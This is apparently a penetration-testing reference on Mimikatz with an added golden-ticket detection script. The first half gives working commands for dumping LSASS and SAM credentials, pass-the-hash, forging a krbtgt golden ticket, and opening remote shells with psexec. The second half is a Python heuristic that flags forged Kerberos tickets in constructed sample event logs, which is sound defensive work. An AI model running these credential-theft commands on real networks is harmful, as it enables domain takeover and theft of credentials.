Mimikatz

Overview

https://github.com/gentilkiwi/mimikatz

There are various spin-offs of the Mimikatz project, including a PowerShell variety. Mimikatz is primarily used to dump hashes from LSASS, pass hashes, or generate Kerberos tickets for use in attacks.

General Usage

Elevate to Highest Integrity Level

C:\ > mimikatz.exe

mimikatz # privilege::debug
mimikatz # token::elevate

Dump Hashes in LSASS

mimikatz # sekurlsa::logonpasswords

Dump SAM

mimikatz # lsadump::sam

Dump Cached TGTs

mimikatz # sekurlsa::tickets

Overpass the Hash

Create a TGT using a dumped NTLM hash

mimikatz # sekurlsa::pth /user:username /ntlm:hash-here /domain:domain.tld

Golden Ticket Attack

If an attacker runs mimikatz on a domain controller, they can access the Kerberos hash of the krbtgt account and arbitrarily create tickets for themselves to access any resource on the network.

C:\ > mimikatz.exe

mimikatz # privilege::debug
mimikatz # lsadump::lsa /inject /name:krbtgt
  1. Copy the domain SID
  2. Copy the NTLM hash of the krbtgt account
mimikatz # kerberos::golden /User:Administrator /domain:domain.tld /sid:<domain_sid> /krbtgt:<krbtgt_ntlm_hash> /id:500 /ptt

mimikatz # misc::cmd

Now, a command prompt is running with the golden ticket we created.

C:\ > psexec.exe \\hostname cmd.exe

This enables an attacker to open a remote command prompt on any host in the domain, due to the availability of a golden ticket.
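From the defender's side, a forged TGT is never issued by the KDC, so service-ticket requests (Event ID 4769) for an account with no matching TGT request (Event ID 4768) from the same source are a classic golden-ticket indicator, and kerberos::golden as shown above uses the krbtgt NTLM (RC4) key, so the resulting tickets show TicketEncryptionType 0x17 in a domain that otherwise issues AES tickets. The following is an added example of that correlation over constructed sample events, not code from the page or the Mimikatz project; the event records, hostnames and IPs are made up.

```python
"""Golden-ticket heuristics over Windows Security events (constructed sample data)."""

# Constructed sample events shaped like Windows Security log fields.
# 4768 = Kerberos TGT requested, 4769 = Kerberos service ticket requested.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "jsmith", "IpAddress": "10.0.0.5",
     "TicketEncryptionType": "0x12"},
    {"EventID": 4769, "TargetUserName": "jsmith", "ServiceName": "cifs/fs01",
     "IpAddress": "10.0.0.5", "TicketEncryptionType": "0x12"},
    # No 4768 precedes these: the TGT was forged, not issued by the KDC, and the
    # tickets are RC4 (0x17) because kerberos::golden was given the krbtgt NTLM hash.
    {"EventID": 4769, "TargetUserName": "Administrator", "ServiceName": "cifs/dc01",
     "IpAddress": "10.0.0.77", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "TargetUserName": "Administrator", "ServiceName": "host/dc01",
     "IpAddress": "10.0.0.77", "TicketEncryptionType": "0x17"},
]

RC4_HMAC = "0x17"  # Ticket encryption type value for RC4-HMAC
AES256 = "0x12"    # Ticket encryption type value for AES256-CTS-HMAC-SHA1-96


def find_suspicious_tgs(events, aes_expected=True):
    """Return {(user, source_ip): set(reasons)} for 4769 events that look forged.

    Reason 1: a service ticket was requested but no TGT request (4768) was seen
              for the same account from the same source address.
    Reason 2: the ticket uses RC4 although the domain is expected to issue AES.
    """
    tgt_seen = set()
    for e in events:
        if e["EventID"] == 4768:
            tgt_seen.add((e["TargetUserName"].lower(), e["IpAddress"]))

    findings = {}
    for e in events:
        if e["EventID"] != 4769:
            continue
        key = (e["TargetUserName"].lower(), e["IpAddress"])
        reasons = []
        if key not in tgt_seen:
            reasons.append("4769 without prior 4768 from same source")
        if aes_expected and e.get("TicketEncryptionType") == RC4_HMAC:
            reasons.append("RC4 service ticket in an AES domain")
        if reasons:
            findings.setdefault(key, set()).update(reasons)
    return findings


if __name__ == "__main__":
    for (user, ip), reasons in find_suspicious_tgs(SAMPLE_EVENTS).items():
        print(f"{user}@{ip}: {'; '.join(sorted(reasons))}")
```

In production the 4768 and 4769 events may land on different domain controllers, so the correlation has to run over the merged logs of all DCs, and accounts that legitimately still use RC4 need an allow-list before the encryption-type check is useful.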